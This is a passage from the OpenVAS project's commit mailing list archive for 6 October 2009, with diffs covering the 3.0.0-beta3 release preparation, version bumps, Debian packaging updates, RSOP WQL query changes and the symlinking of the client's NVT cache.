openvas-libraries-3.0.0-beta3 release. Copied: tags/openvas-libraries-release-3.0.0-beta3 (from rev 5392, trunk/openvas-libraries) From scm-commit at wald.intevation.org Tue Oct 6 11:48:22 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 11:48:22 +0200 (CEST) Subject: [Openvas-commits] r5394 - in trunk/openvas-manager: . src Message-ID: <20091006094822.9CBD785D9F7B@pyrosoma.intevation.org> Author: mattm Date: 2009-10-06 11:48:22 +0200 (Tue, 06 Oct 2009) New Revision: 5394 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/tasks_sql.h Log: * src/tasks_sql.h (init_manage): Log database versions on version failure. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2009-10-06 09:46:36 UTC (rev 5393) +++ trunk/openvas-manager/ChangeLog 2009-10-06 09:48:22 UTC (rev 5394) @@ -1,5 +1,9 @@ 2009-10-06 Matthew Mundell + * src/tasks_sql.h (init_manage): Log database versions on version failure. + +2009-10-06 Matthew Mundell + Complete database initialisation check started yesterday. * src/tasks_sql.h (init_manage): Add nvt_cache_mode arg. Update caller. Modified: trunk/openvas-manager/src/tasks_sql.h =================================================================== --- trunk/openvas-manager/src/tasks_sql.h 2009-10-06 09:46:36 UTC (rev 5393) +++ trunk/openvas-manager/src/tasks_sql.h 2009-10-06 09:48:22 UTC (rev 5394) @@ -918,7 +918,15 @@ { if (database_version && strcmp (database_version, G_STRINGIFY (DATABASE_VERSION))) - return -2; + { + g_message ("%s: database version of database: %s\n", + __FUNCTION__, + database_version); + g_message ("%s: database version supported by manager: %s\n", + __FUNCTION__, + G_STRINGIFY (DATABASE_VERSION)); + return -2; + } /* If database_version was NULL then meta was missing, so assume * that the database is missing, which is OK. */ @@ -928,7 +936,15 @@ if (database_version) { if (strcmp (database_version, G_STRINGIFY (DATABASE_VERSION))) - return -2; + { + g_message ("%s: database version of database: %s\n", + __FUNCTION__, + database_version); + g_message ("%s: database version supported by manager: %s\n", + __FUNCTION__, + G_STRINGIFY (DATABASE_VERSION)); + return -2; + } } else /* Assume database is missing. */ From scm-commit at wald.intevation.org Tue Oct 6 11:49:30 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 11:49:30 +0200 (CEST) Subject: [Openvas-commits] r5395 - in trunk/openvas-libraries: . doc Message-ID: <20091006094930.6F7DB861EAD4@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 11:49:30 +0200 (Tue, 06 Oct 2009) New Revision: 5395 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/VERSION trunk/openvas-libraries/doc/Doxyfile trunk/openvas-libraries/doc/Doxyfile_full Log: Post-release version bump. * VERSION: Set to 3.0.0.beta4.SVN. * doc/Doxyfile, doc/Doxyfile_full: Updated PROJECT_NUMBER. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2009-10-06 09:48:22 UTC (rev 5394) +++ trunk/openvas-libraries/ChangeLog 2009-10-06 09:49:30 UTC (rev 5395) @@ -1,5 +1,13 @@ 2009-10-06 Michael Wiegand + Post-release version bump. + + * VERSION: Set to 3.0.0.beta4.SVN. + + * doc/Doxyfile, doc/Doxyfile_full: Updated PROJECT_NUMBER. + +2009-10-06 Michael Wiegand + Preparing the openvas-libraries 3.0.0-beta3 release. * CHANGES: Updated. Modified: trunk/openvas-libraries/VERSION =================================================================== --- trunk/openvas-libraries/VERSION 2009-10-06 09:48:22 UTC (rev 5394) +++ trunk/openvas-libraries/VERSION 2009-10-06 09:49:30 UTC (rev 5395) @@ -1 +1 @@ -3.0.0.beta3 +3.0.0.beta4.SVN Modified: trunk/openvas-libraries/doc/Doxyfile =================================================================== --- trunk/openvas-libraries/doc/Doxyfile 2009-10-06 09:48:22 UTC (rev 5394) +++ trunk/openvas-libraries/doc/Doxyfile 2009-10-06 09:49:30 UTC (rev 5395) @@ -23,7 +23,7 @@ # This could be handy for archiving the generated documentation or # if some version control system is used. -PROJECT_NUMBER = 3.0.0.beta3 +PROJECT_NUMBER = 3.0.0.beta4.SVN # The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) # base path where the generated documentation will be put. Modified: trunk/openvas-libraries/doc/Doxyfile_full =================================================================== --- trunk/openvas-libraries/doc/Doxyfile_full 2009-10-06 09:48:22 UTC (rev 5394) +++ trunk/openvas-libraries/doc/Doxyfile_full 2009-10-06 09:49:30 UTC (rev 5395) @@ -23,7 +23,7 @@ # This could be handy for archiving the generated documentation or # if some version control system is used. -PROJECT_NUMBER = 3.0.0.beta3 +PROJECT_NUMBER = 3.0.0.beta4.SVN # The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) # base path where the generated documentation will be put. From scm-commit at wald.intevation.org Tue Oct 6 11:55:26 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 11:55:26 +0200 (CEST) Subject: [Openvas-commits] r5396 - trunk/doc/website Message-ID: <20091006095526.CDBCA852FE2A@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 11:55:26 +0200 (Tue, 06 Oct 2009) New Revision: 5396 Modified: trunk/doc/website/template_header.m4 Log: Update version and download link for openvas-libraries 3.0.0-beta. Modified: trunk/doc/website/template_header.m4 =================================================================== --- trunk/doc/website/template_header.m4 2009-10-06 09:49:30 UTC (rev 5395) +++ trunk/doc/website/template_header.m4 2009-10-06 09:55:26 UTC (rev 5396) @@ -177,7 +177,7 @@

OpenVAS 3.0 BETA:
- -libraries 3.0.0-beta2
+ -libraries 3.0.0-beta3
-scanner 3.0.0-beta2
-client 3.0.0-beta1
Optional:
From scm-commit at wald.intevation.org Tue Oct 6 12:18:16 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 12:18:16 +0200 (CEST) Subject: [Openvas-commits] r5397 - trunk/openvas-packaging/openvas-libraries/debian/trunk/debian Message-ID: <20091006101816.7A778861EAB5@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 12:18:14 +0200 (Tue, 06 Oct 2009) New Revision: 5397 Modified: trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/control trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/rules Log: * New upstream release. * rules: Set sysconfdir at configure time. * control: Bumped cmake dependency since it was raised upstream. Modified: trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog 2009-10-06 09:55:26 UTC (rev 5396) +++ trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog 2009-10-06 10:18:14 UTC (rev 5397) @@ -1,3 +1,11 @@ +openvas-libraries (3.0.0-beta3) UNRELEASED; urgency=low + + * New upstream release. + * rules: Set sysconfdir at configure time. + * control: Bumped cmake dependency since it was raised upstream. + + -- Michael Wiegand Tue, 06 Oct 2009 12:06:19 +0200 + openvas-libraries (3.0.0-beta2) UNRELEASED; urgency=low * New upstream release. Modified: trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/control =================================================================== --- trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/control 2009-10-06 09:55:26 UTC (rev 5396) +++ trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/control 2009-10-06 10:18:14 UTC (rev 5397) @@ -3,7 +3,7 @@ Priority: optional Maintainer: Debian OpenVAS Maintainers Uploaders: Tim Brown , Javier Fernandez-Sanguino Pen~a , Jan Wagner -Build-Depends: debhelper (>= 5), autotools-dev, libgnutls-dev, libpcap-dev, libglib2.0-dev, dpatch, libgpgme11-dev (>= 1.1.2), bison, cmake, libgcrypt11-dev +Build-Depends: debhelper (>= 5), autotools-dev, libgnutls-dev, libpcap-dev, libglib2.0-dev, dpatch, libgpgme11-dev (>= 1.1.2), bison, cmake (>= 2.6), libgcrypt11-dev Homepage: http://www.openvas.org/ Vcs-Browser: https://wald.intevation.org/plugins/scmsvn/viewcvs.php/trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/?root=openvas Vcs-Svn: https://svn.wald.intevation.org/svn/openvas/trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/ Modified: trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/rules =================================================================== --- trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/rules 2009-10-06 09:55:26 UTC (rev 5396) +++ trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/rules 2009-10-06 10:18:14 UTC (rev 5397) @@ -41,7 +41,7 @@ ifneq "$(wildcard /usr/share/misc/config.guess)" "" cp -f /usr/share/misc/config.guess config.guess endif - ./configure $(CROSS) --prefix=/usr --mandir=\$${prefix}/share/man --infodir=\$${prefix}/share/info --localstatedir=/var CFLAGS="$(CFLAGS)" + ./configure $(CROSS) --prefix=/usr --mandir=\$${prefix}/share/man --infodir=\$${prefix}/share/info --localstatedir=/var --sysconfdir=/etc CFLAGS="$(CFLAGS)" build: build-stamp From scm-commit at wald.intevation.org Tue Oct 6 12:48:26 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 12:48:26 +0200 (CEST) Subject: [Openvas-commits] r5398 - in trunk/openvas-scanner: . doc Message-ID: <20091006104826.4C311861EABA@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 12:48:25 +0200 (Tue, 06 Oct 2009) New Revision: 5398 Modified: trunk/openvas-scanner/CHANGES trunk/openvas-scanner/ChangeLog trunk/openvas-scanner/VERSION trunk/openvas-scanner/doc/Doxyfile trunk/openvas-scanner/doc/Doxyfile_full Log: Preparing the openvas-scanner 3.0.0-beta3 release. * VERSION: Set to 3.0.0.beta3 * doc/Doxyfile, doc/Doxyfile_full: Updated PROJECT_NUMBER. * CHANGES: Updated. Modified: trunk/openvas-scanner/CHANGES =================================================================== --- trunk/openvas-scanner/CHANGES 2009-10-06 10:18:14 UTC (rev 5397) +++ trunk/openvas-scanner/CHANGES 2009-10-06 10:48:25 UTC (rev 5398) @@ -1,3 +1,51 @@ +openvas-scanner 3.0.0-beta3 (2009-10-06) + +This release is the third beta version of openvas-scanner +leading up to the upcoming 3.0 release of OpenVAS. +Apart from the name change from openvas-server to +openvas-scanner, the platform-dependent NVTs as +well as the OpenVAS NVT Feed synchronisation script +are now integrated. + +OpenVAS 3.0 will introduce a new architecture where openvas-libraries +now includes openvas-libnasl as well as redundant code from openvas-client +and where openvas-server is renamed to openvas-scanner and includes any +platform-dependent elements of openvas-plugins. As a result of this, +the source code will shrink, though new features will be added. Also, +for running the scanner now only 2 modules are required (instead of 4 +as for OpenVAS 2.0). + +New features of OpenVAS include support for IPv6 and WMI-Clients. +Version 3.0 prepares the new OpenVAS Manager and OpenVAS Administrator +as optional extension. This combination leverages the vulnerability +scanner to a comprehensive vulnerability management solution. + +The "beta" releases are intended to allow testing of the upcoming +3.0 series. It should be kept separate from OpenVAS 2.0 installations +and not be used in a production environment. + +Many thanks to everyone who has contributed to the 3.0.0 release: +Chandrashekhar B, Tim Brown, Javier Fernández-Sanguino Peña, +Vlatko Kosturjak, Matthew Mundell, Srinivasa NL, Jan Wagner, +Jan-Oliver Wagner, Michael Wiegand and Felix Wolfsteller. + +Main changes compared to 2.0.x: + +* IPv6 support +* Integration of platform dependent NVTs from openvas-plugins +* Integration of openvas-nvt-sync script +* Renamed daemon from openvasd to openvassd +* glib dependency raised from 2.6 to 2.12 +* openvasd-config removed as no other packages require this + package for building. +* For the same reason, no header files are installed anymore + +Main changes compared to 3.0.0-beta2: + +* Adjustments for the API changes that happened from + openvas-libraries 3.0.0-beta2 to 3.0.0-beta3. + + openvas-scanner 3.0.0-beta2 (2009-09-28) This release is the second beta version of openvas-scanner Modified: trunk/openvas-scanner/ChangeLog =================================================================== --- trunk/openvas-scanner/ChangeLog 2009-10-06 10:18:14 UTC (rev 5397) +++ trunk/openvas-scanner/ChangeLog 2009-10-06 10:48:25 UTC (rev 5398) @@ -1,3 +1,13 @@ +2009-10-06 Michael Wiegand + + Preparing the openvas-scanner 3.0.0-beta3 release. + + * VERSION: Set to 3.0.0.beta3 + + * doc/Doxyfile, doc/Doxyfile_full: Updated PROJECT_NUMBER. + + * CHANGES: Updated. + 2009-10-05 Felix Wolfsteller Removed dependence on libopenvas.h. Modified: trunk/openvas-scanner/VERSION =================================================================== --- trunk/openvas-scanner/VERSION 2009-10-06 10:18:14 UTC (rev 5397) +++ trunk/openvas-scanner/VERSION 2009-10-06 10:48:25 UTC (rev 5398) @@ -1 +1 @@ -3.0.0.beta3.SVN +3.0.0.beta3 Modified: trunk/openvas-scanner/doc/Doxyfile =================================================================== --- trunk/openvas-scanner/doc/Doxyfile 2009-10-06 10:18:14 UTC (rev 5397) +++ trunk/openvas-scanner/doc/Doxyfile 2009-10-06 10:48:25 UTC (rev 5398) @@ -23,7 +23,7 @@ # This could be handy for archiving the generated documentation or # if some version control system is used. -PROJECT_NUMBER = 3.0.0.beta3.SVN +PROJECT_NUMBER = 3.0.0.beta3 # The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) # base path where the generated documentation will be put. Modified: trunk/openvas-scanner/doc/Doxyfile_full =================================================================== --- trunk/openvas-scanner/doc/Doxyfile_full 2009-10-06 10:18:14 UTC (rev 5397) +++ trunk/openvas-scanner/doc/Doxyfile_full 2009-10-06 10:48:25 UTC (rev 5398) @@ -23,7 +23,7 @@ # This could be handy for archiving the generated documentation or # if some version control system is used. -PROJECT_NUMBER = 3.0.0.beta3.SVN +PROJECT_NUMBER = 3.0.0.beta3 # The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) # base path where the generated documentation will be put. From scm-commit at wald.intevation.org Tue Oct 6 12:50:55 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 12:50:55 +0200 (CEST) Subject: [Openvas-commits] r5399 - tags Message-ID: <20091006105055.08106861EABA@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 12:50:54 +0200 (Tue, 06 Oct 2009) New Revision: 5399 Added: tags/openvas-scanner-release-3.0.0-beta3/ Log: Tagging openvas-scanner 3.0.0-beta3 release. Copied: tags/openvas-scanner-release-3.0.0-beta3 (from rev 5398, trunk/openvas-scanner) From scm-commit at wald.intevation.org Tue Oct 6 12:52:54 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 12:52:54 +0200 (CEST) Subject: [Openvas-commits] r5400 - in trunk/openvas-scanner: . doc Message-ID: <20091006105254.4A700865F480@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 12:52:52 +0200 (Tue, 06 Oct 2009) New Revision: 5400 Modified: trunk/openvas-scanner/ChangeLog trunk/openvas-scanner/VERSION trunk/openvas-scanner/doc/Doxyfile trunk/openvas-scanner/doc/Doxyfile_full Log: Post-release version bump. * VERSION: Set to 3.0.0.beta4.SVN. * doc/Doxyfile, doc/Doxyfile_full: Updated PROJECT_NUMBER. Modified: trunk/openvas-scanner/ChangeLog =================================================================== --- trunk/openvas-scanner/ChangeLog 2009-10-06 10:50:54 UTC (rev 5399) +++ trunk/openvas-scanner/ChangeLog 2009-10-06 10:52:52 UTC (rev 5400) @@ -1,5 +1,13 @@ 2009-10-06 Michael Wiegand + Post-release version bump. + + * VERSION: Set to 3.0.0.beta4.SVN. + + * doc/Doxyfile, doc/Doxyfile_full: Updated PROJECT_NUMBER. + +2009-10-06 Michael Wiegand + Preparing the openvas-scanner 3.0.0-beta3 release. * VERSION: Set to 3.0.0.beta3 Modified: trunk/openvas-scanner/VERSION =================================================================== --- trunk/openvas-scanner/VERSION 2009-10-06 10:50:54 UTC (rev 5399) +++ trunk/openvas-scanner/VERSION 2009-10-06 10:52:52 UTC (rev 5400) @@ -1 +1 @@ -3.0.0.beta3 +3.0.0.beta4.SVN Modified: trunk/openvas-scanner/doc/Doxyfile =================================================================== --- trunk/openvas-scanner/doc/Doxyfile 2009-10-06 10:50:54 UTC (rev 5399) +++ trunk/openvas-scanner/doc/Doxyfile 2009-10-06 10:52:52 UTC (rev 5400) @@ -23,7 +23,7 @@ # This could be handy for archiving the generated documentation or # if some version control system is used. -PROJECT_NUMBER = 3.0.0.beta3 +PROJECT_NUMBER = 3.0.0.beta4.SVN # The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) # base path where the generated documentation will be put. Modified: trunk/openvas-scanner/doc/Doxyfile_full =================================================================== --- trunk/openvas-scanner/doc/Doxyfile_full 2009-10-06 10:50:54 UTC (rev 5399) +++ trunk/openvas-scanner/doc/Doxyfile_full 2009-10-06 10:52:52 UTC (rev 5400) @@ -23,7 +23,7 @@ # This could be handy for archiving the generated documentation or # if some version control system is used. -PROJECT_NUMBER = 3.0.0.beta3 +PROJECT_NUMBER = 3.0.0.beta4.SVN # The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) # base path where the generated documentation will be put. From scm-commit at wald.intevation.org Tue Oct 6 12:59:30 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 12:59:30 +0200 (CEST) Subject: [Openvas-commits] r5401 - trunk/doc/website Message-ID: <20091006105930.891A7865F480@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 12:59:30 +0200 (Tue, 06 Oct 2009) New Revision: 5401 Modified: trunk/doc/website/template_header.m4 Log: Updated version and download link for openvas-scanner 3.0.0-beta. Modified: trunk/doc/website/template_header.m4 =================================================================== --- trunk/doc/website/template_header.m4 2009-10-06 10:52:52 UTC (rev 5400) +++ trunk/doc/website/template_header.m4 2009-10-06 10:59:30 UTC (rev 5401) @@ -178,7 +178,7 @@

OpenVAS 3.0 BETA:
-libraries 3.0.0-beta3
- -scanner 3.0.0-beta2
+ -scanner 3.0.0-beta3
-client 3.0.0-beta1
Optional:
-manager 0.9.0
From scm-commit at wald.intevation.org Tue Oct 6 13:32:00 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 13:32:00 +0200 (CEST) Subject: [Openvas-commits] r5402 - in trunk/openvas-plugins: . scripts Message-ID: <20091006113200.3D255861EAAC@pyrosoma.intevation.org> Author: chandra Date: 2009-10-06 13:31:57 +0200 (Tue, 06 Oct 2009) New Revision: 5402 Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/scripts/wmi_rsop.inc Log: Updated RSOP WQL queries Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-06 10:59:30 UTC (rev 5401) +++ trunk/openvas-plugins/ChangeLog 2009-10-06 11:31:57 UTC (rev 5402) @@ -1,5 +1,10 @@ 2009-10-06 Chandrashekhar B + * scripts/wmi_rsop.inc: + Updated RSOP WQL queries. + +2009-10-06 Chandrashekhar B + * scripts/gb_ibm_db2_unspesified_vuln_win.nasl, scripts/gb_google_chrome_sec_bypass_vuln_oct09.nasl, scripts/gb_cpcreator_detect.nasl, Modified: trunk/openvas-plugins/scripts/wmi_rsop.inc =================================================================== --- trunk/openvas-plugins/scripts/wmi_rsop.inc 2009-10-06 10:59:30 UTC (rev 5401) +++ trunk/openvas-plugins/scripts/wmi_rsop.inc 2009-10-06 11:31:57 UTC (rev 5402) @@ -31,7 +31,7 @@ function wmi_rsop_accesstoken(handle) { - query = 'Select * from RSOP_UserPrivilegeRight'; + query = 'Select * from RSOP_UserPrivilegeRight where precedence=1'; rsopList = wmi_query_rsop(wmi_handle:handle, query:query); @@ -44,7 +44,7 @@ function wmi_rsop_auditpolicy(handle) { - query = 'Select * from RSOP_AuditPolicy'; + query = 'Select * from RSOP_AuditPolicy where precedence=1'; rsopList = wmi_query_rsop(wmi_handle:handle, query:query); @@ -57,7 +57,7 @@ function wmi_rsop_policysetting(handle) { - query = 'Select * from RSOP_PolicySetting'; + query = 'Select * from RSOP_PolicySetting where precedence=1'; rsopList = wmi_query_rsop(wmi_handle:handle, query:query); @@ -70,7 +70,7 @@ function wmi_rsop_lockoutpolicy(handle) { - query = 'Select * from RSOP_SecuritySettingBoolean'; + query = 'Select * from RSOP_SecuritySettingBoolean where precedence=1'; rsopList = wmi_query_rsop(wmi_handle:handle, query:query); @@ -83,7 +83,7 @@ function wmi_rsop_passwdpolicy(handle) { - query = 'Select * from RSOP_SecuritySettingNumeric'; + query = 'Select * from RSOP_SecuritySettingNumeric where precedence=1'; rsopList = wmi_query_rsop(wmi_handle:handle, query:query); From scm-commit at wald.intevation.org Tue Oct 6 13:55:48 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 13:55:48 +0200 (CEST) Subject: [Openvas-commits] r5403 - trunk/openvas-packaging/openvas-scanner/debian/trunk/debian Message-ID: <20091006115548.E112D861EACF@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-06 13:55:47 +0200 (Tue, 06 Oct 2009) New Revision: 5403 Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/control trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.init Log: * New upstream release. * control: Bumped openvas-libraries dependency. * openvas-scanner.init: Removed superfluous "-D" (now obsolete since becoming a daemon is the default behaviour). Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog 2009-10-06 11:31:57 UTC (rev 5402) +++ trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/changelog 2009-10-06 11:55:47 UTC (rev 5403) @@ -1,3 +1,12 @@ +openvas-scanner (3.0.0.beta3-1) UNRELEASED; urgency=low + + * New upstream release. + * control: Bumped openvas-libraries dependency. + * openvas-scanner.init: Removed superfluous "-D" (now obsolete since becoming + a daemon is the default behaviour). + + -- Michael Wiegand Tue, 06 Oct 2009 13:53:08 +0200 + openvas-scanner (3.0.0.beta2-2) UNRELEASED; urgency=low * Make sure the C based NVTs (CNVTs) are actually installed. Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/control =================================================================== --- trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/control 2009-10-06 11:31:57 UTC (rev 5402) +++ trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/control 2009-10-06 11:55:47 UTC (rev 5403) @@ -3,7 +3,7 @@ Priority: optional Maintainer: Debian OpenVAS Maintainers Uploaders: Tim Brown , Javier Fernandez-Sanguino Pen~a , Jan Wagner , Joey Schulze -Build-Depends: debhelper (>= 5), autotools-dev, libgcrypt11-dev, libglib2.0-dev, libgnutls-dev, libopenvas3-dev (>= 3.0.0), libpcap-dev, libwrap0-dev, pkg-config, po-debconf, devscripts, dpatch +Build-Depends: debhelper (>= 5), autotools-dev, libgcrypt11-dev, libglib2.0-dev, libgnutls-dev, libopenvas3-dev (>= 3.0.0-beta3), libpcap-dev, libwrap0-dev, pkg-config, po-debconf, devscripts, dpatch Homepage: http://www.openvas.org/ Vcs-Browser: https://wald.intevation.org/plugins/scmsvn/viewcvs.php/trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/?root=openvas Vcs-Svn: https://svn.wald.intevation.org/svn/openvas/trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/ Modified: trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.init =================================================================== --- trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.init 2009-10-06 11:31:57 UTC (rev 5402) +++ trunk/openvas-packaging/openvas-scanner/debian/trunk/debian/openvas-scanner.init 2009-10-06 11:55:47 UTC (rev 5403) @@ -22,7 +22,7 @@ # Description: Controls the main OpenVAS daemon "openvassd". ### END INIT INFO -# daemon options (-D implied, not needed) +# daemon options DAEMONOPTS="-q" # time to wait for daemons death, in seconds # don't set it too low or you might not let openvassd die gracefully @@ -80,7 +80,7 @@ return 1 fi check_certs - start-stop-daemon --start --exec $DAEMON -- $DAEMONOPTS -D 2>&1 >/dev/null + start-stop-daemon --start --exec $DAEMON -- $DAEMONOPTS 2>&1 >/dev/null errcode=$? # If we don't sleep then running() might not see the pidfile sleep $DODTIME From scm-commit at wald.intevation.org Tue Oct 6 13:57:01 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 6 Oct 2009 13:57:01 +0200 (CEST) Subject: [Openvas-commits] r5404 - in trunk/openvas-client: . openvas openvas/prefs_dialog Message-ID: <20091006115701.E47C3861EACF@pyrosoma.intevation.org> Author: mattm Date: 2009-10-06 13:57:00 +0200 (Tue, 06 Oct 2009) New Revision: 5404 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/context.c trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c Log: * openvas/prefs_dialog/prefs_scope_tree.c (create_omp_scope): Symlink NVT cache instead of copying it. Turn off saving of report NVT cache. * openvas/context.c (context_new): Symlink NVT to parent cache instead of saving cache to disk. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-06 11:55:47 UTC (rev 5403) +++ trunk/openvas-client/ChangeLog 2009-10-06 11:57:00 UTC (rev 5404) @@ -1,5 +1,13 @@ 2009-10-06 Matthew Mundell + * openvas/prefs_dialog/prefs_scope_tree.c (create_omp_scope): Symlink + NVT cache instead of copying it. Turn off saving of report NVT cache. + + * openvas/context.c (context_new): Symlink NVT to parent cache instead of + saving cache to disk. + +2009-10-06 Matthew Mundell + * openvas/prefs_dialog/prefs_scope_tree.c (scopetree_refresh): Remove verbose flag setting. Correct indentation. Modified: trunk/openvas-client/openvas/context.c =================================================================== --- trunk/openvas-client/openvas/context.c 2009-10-06 11:55:47 UTC (rev 5403) +++ trunk/openvas-client/openvas/context.c 2009-10-06 11:57:00 UTC (rev 5404) @@ -856,7 +856,38 @@ if (copied_plugins) if (prefs_get_int (Global, "cache_plugin_information") > 0) { - plugin_cache_write (context, context->plugins_md5sum); + int pwd; + + /* Symbolic link the server NVT cache into the scope. */ + + pwd = open (".", O_RDONLY); + if (pwd == -1) + { + show_error_and_wait (_("%s: failed to open current directory"), + __FUNCTION__); + return NULL; + } + + if (chdir (context->dir)) + { + show_error_and_wait (_("%s: failed to chdir to %s"), + context->dir, + __FUNCTION__); + return NULL; + } + + if (symlink ("../openvas_nvt_cache", "openvas_nvt_cache")) + { + show_error_and_wait (_("%s: failed to symlink to parent NVT cache"), + __FUNCTION__); + return NULL; + } + + if (fchdir (pwd)) + show_error_and_wait (_("%s: failed to fchdir back to previous dir"), + __FUNCTION__); + + close (pwd); } #endif /* USE_OMP */ Modified: trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c =================================================================== --- trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-06 11:55:47 UTC (rev 5403) +++ trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-06 11:57:00 UTC (rev 5404) @@ -950,6 +950,8 @@ assert (context->type == CONTEXT_SERVER); + g_free (servers_dir_name); + if (server_dir_name == NULL) { show_error (_("%s: server dir is NULL"), __FUNCTION__); @@ -968,7 +970,6 @@ if (g_mkdir_with_parents (*scope_dir_name, 0700 /* d-w-rwxr-- */) == -1) { show_error (_("%s: g_mkdir_with_parents"), __FUNCTION__); - g_free (servers_dir_name); return -2; } @@ -979,7 +980,6 @@ { show_error (_("%s: g_file_set_contents"), __FUNCTION__); g_free (file_name); - g_free (servers_dir_name); return -3; } @@ -1006,7 +1006,6 @@ // FIX note error g_error_free (error); g_free (file_name); - g_free (servers_dir_name); return -4; } @@ -1036,52 +1035,49 @@ // FIX note error g_error_free (error); g_free (file_name); - g_free (servers_dir_name); return -5; } } g_free (file_name); - /* Copy server NVT cache into scope. */ - { - gchar *cache = NULL; - gsize cache_size; + int pwd; - file_name = g_build_filename (server_dir_name, - "openvas_nvt_cache", - NULL); - ok = g_file_get_contents (file_name, &cache, &cache_size, NULL); - if (ok) + /* Symbolic link the server NVT cache into the scope. */ + + pwd = open (".", O_RDONLY); + if (pwd == -1) { - g_free (servers_dir_name); - g_free (file_name); + show_error_and_wait (_("%s: failed to open current directory"), + __FUNCTION__); + return NULL; + } - file_name = g_build_filename (*scope_dir_name, - "openvas_nvt_cache", - NULL); - ok = g_file_set_contents (file_name, cache, cache_size, NULL); - g_free (file_name); - g_free (cache); - - if (ok) - return 0; - - show_error (_("%s: set contents"), __FUNCTION__); - return -1; + if (chdir (*scope_dir_name)) + { + show_error_and_wait (_("%s: failed to chdir to %s"), + context->dir, + __FUNCTION__); + return NULL; } - else + + if (symlink ("../openvas_nvt_cache", "openvas_nvt_cache")) { - show_error (_("%s: get contents"), __FUNCTION__); - g_free (servers_dir_name); - g_free (file_name); - return -1; + show_error_and_wait (_("%s: failed to symlink to parent NVT cache"), + __FUNCTION__); + return NULL; } + + if (fchdir (pwd)) + show_error_and_wait (_("%s: failed to fchdir back to previous dir"), + __FUNCTION__); + + close (pwd); } } - g_free (servers_dir_name); + show_error (_("%s: check_is_dir"), __FUNCTION__); return -1; } @@ -1141,6 +1137,8 @@ g_free (file_name); if (!ok) goto fail; + /* Turned off for now to reduce disk usage. */ +#if 0 file_name = g_build_filename (scope_dir_name, "openvas_nvt_cache", NULL); ok = g_file_get_contents (file_name, &rcfile, &rcfile_len, NULL); g_free (file_name); @@ -1148,6 +1146,7 @@ file_name = g_build_filename (report_dir_name, "openvas_nvt_cache", NULL); ok = g_file_set_contents (file_name, rcfile, strlen (rcfile), NULL); g_free (file_name); +#endif if (ok) { From scm-commit at wald.intevation.org Tue Oct 6 15:28:39 2009 From: 